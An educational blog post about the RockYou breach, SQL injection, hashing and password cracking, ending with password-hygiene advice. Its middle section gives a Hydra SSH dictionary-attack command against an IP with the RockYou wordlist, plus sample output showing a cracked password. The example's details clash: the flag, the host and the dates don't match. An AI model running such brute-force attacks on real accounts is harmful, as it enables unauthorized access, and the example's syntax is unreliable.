How Passwords are Cracked

## The RockYou Breach: A Cautionary Tale **RockYou**, a popular widget developer for social networks (e.g., Myspace, Facebook), faced a significant breach back in 2009. How? - Hackers exploited a decade-old SQL injection flaw. Result? - Over **32 million user accounts** exposed. > [!tip]- SQL Injection > This vulnerability allows attackers to manipulate SQL queries by injecting malicious code into an application's input fields, granting them unauthorized access to a database. Once inside, attackers can view, modify, or delete data. Essentially, SQL injections trick the system into executing unintended SQL commands. The root cause is often insufficient input validation and application code that directly uses user input in database queries. To prevent SQL injections, it's important that developers use techniques like prepared statements and parameterized queries. ### RockYou's fatal errors - Poor password policies. - Storing passwords in plaintext, not hashed. **32 million** passwords were leaked, **14 million** of which were unique. > [!tip]- Hashing > Hashing is the process of converting varied-size input data into a fixed-length string of bytes, known as a "hash." It's essentially a scrambled, irreversible string that's deterministic- meaning the same input always produces the same hash. Hashing is pivotal for data integrity and password storage. ## Implications for Users If you ever had a basic password, it's likely part of such a list. This is because cracking tools like **Hydra, HashCat, and John the Ripper** exist. Password cracking tools: - Handle many hash types. - Operate at high speeds. - Are freely accessible. ### Password Cracking Exercise using Hydra Cracking tools are relatively easy to use. Below is the syntax to run a Hydra dictionary attack that can be ran against more than 50 protocols such as Telnet, FTP, HTTP, HTTPS, SMB, SSH, and more: ``` # $ hydra -l <username> -p <passwords> <IP> <service> ``` If we knew the IP address and username we wanted to hack over SSH, we could use RockYou's 14 million unique passwords as references in a single command: ``` # $ hydra -l jdoe -p /usr/share/wordlists/rockyou.txt 147.199.135.221 ssh Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secre t service organizations, or for illegal purposes (this is non-binding, these *** ignore laws an d ethics anyway). Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-09-27 13:51:24 [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to redu ce the tasks: use -t 4 [DATA] max 1 task per 1 server, overall 1 task, 1 login try (1:1/p:1), ~1 try per task [DATA] attacking ssh://localhost:22/ [22](ssh] host: localhost login: jdoe password: Armadillo 1 of 1 target successfully completed, 1 valid password found Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-09-10 13:51:24 ``` And just like that, we found that the `jdoe` account's password is `Armadillo`. #### Are hashed passwords safe from password crackers? Hashed passwords, while not directly reversible, are still vulnerable. With the right tools and a long list of passwords like RockYou's, hackers can: 1. Determine your password's hashing algorithm. 2. Generate hash values for a vast list of potential passwords. 3. Compare to find a match. ## Shielding Against Threats To defend against such threats: 1. **Strengthen your passwords**. Read more on enhancing passwords here: [[Your Passwords are Insecure]]. 2. **Avoid reusing passwords across platforms**. 3. Use a [**Password Manager**](https://en.wikipedia.org/wiki/Password_manager) to manage complex passwords efficiently. Remember: **Always prioritize password security**. Guard your digital front door with a strong password. Don't hand hackers the key. --- *Click here to learn more [[About Me]] and nickhacks.com*